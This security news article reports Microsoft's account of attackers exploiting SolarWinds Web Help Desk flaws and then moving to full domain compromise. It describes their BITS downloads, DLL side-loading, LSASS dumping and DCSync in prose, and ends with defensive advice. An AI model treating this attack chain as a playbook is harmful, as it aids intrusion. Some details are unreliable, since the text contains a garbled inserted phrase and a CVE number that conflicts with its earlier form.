Microsoft has disclosed that it witnessed a multi-phase intrusion in which the threat actors used internet-exposed SolarWinds Web Help Desk (WHD) instances to gain initial access before moving laterally across the organization's network to other valuable assets This article explores revealed vulnerabilities cve. . However, it is unclear whether the activity exploited a previously patched vulnerability (CVE-2025-26399, CVSS score: 9.8) or recently revealed vulnerabilities (CVE-2025-40551, CVSS score: 9.8, and CVE-2025-40536, CVSS score: 8.1), according to the Microsoft Defender Security Research Team.

"In a report released last week, the company stated, "We cannot reliably confirm the exact CVE used to gain an initial foothold because the attacks took place in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time."

CVE-2025-40551 and CVE-2025-26399 both relate to untrusted data deserialization vulnerabilities that could result in remote code execution, whereas CVE-2025-400536 is a security control bypass vulnerability that might enable an unauthenticated attacker to access some restricted functionality. Citing proof of active exploitation in the wild, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-40551 to its list of known exploited vulnerabilities (KEVs) last week. By February 6, 2026, agencies of the Federal Civilian Executive Branch (FCEB) were required to implement the fixes for the defect.

The successful exploitation of the exposed SolarWinds WHD instance in the attacks that Microsoft discovered gave the attackers the ability to execute arbitrary commands within the WHD application context and accomplish unauthenticated remote code execution.

Researchers Sagar Patil, Hardik Suri, Eric Hopper, and Kajhon Soyini observed that "after successful exploitation, the compromised service of a WHD instance spawned PowerShell to leverage BITS [Background Intelligent Transfer Service] for payload download and execution." To gain continuous remote control over the compromised system, the threat actors proceeded to download authentic components linked to Zoho ManageEngine, a genuine remote monitoring and management (RMM) solution. As a follow-up, the attackers enumerated sensitive domain users and groups, including domain administrators.

In addition to trying to set up a scheduled task to start a QEMU virtual machine under the SYSTEM account at system startup in order to hide the tracks in a virtualized environment while exposing SSH access via port forwarding, the attackers also established persistence via reverse SSH and RDP access. employed DLL side-loading on certain hosts by launching a rogue DLL ("sspicli.dll") using "wab.exe," a valid system executable connected to the Windows Address Book, in order to steal credentials and dump the contents of LSASS memory. Microsoft claimed that in at least one instance, the threat actors used a DCSync attack, in which they impersonated a Domain Controller (DC) and asked an Active Directory (AD) database for password hashes and other private data.

Users are recommended to update WHD instances, identify and eliminate any unauthorized RMM tools, rotate admin and service accounts, and isolate compromised machines to minimize the breach in order to combat the threat. According to the Windows manufacturer, "this activity reflects a common but high-impact pattern: when vulnerabilities are unpatched or inadequately monitored, a single exposed application can provide a path to full domain compromise." Attackers used low-noise persistence mechanisms, legitimate administrative tools, and living-off-the-land tactics extensively in this intrusion.

The significance of defense in depth, prompt patching of internet-facing services, and behavior-based detection across the network, identity, and endpoint layers is emphasized by these tradecraft decisions.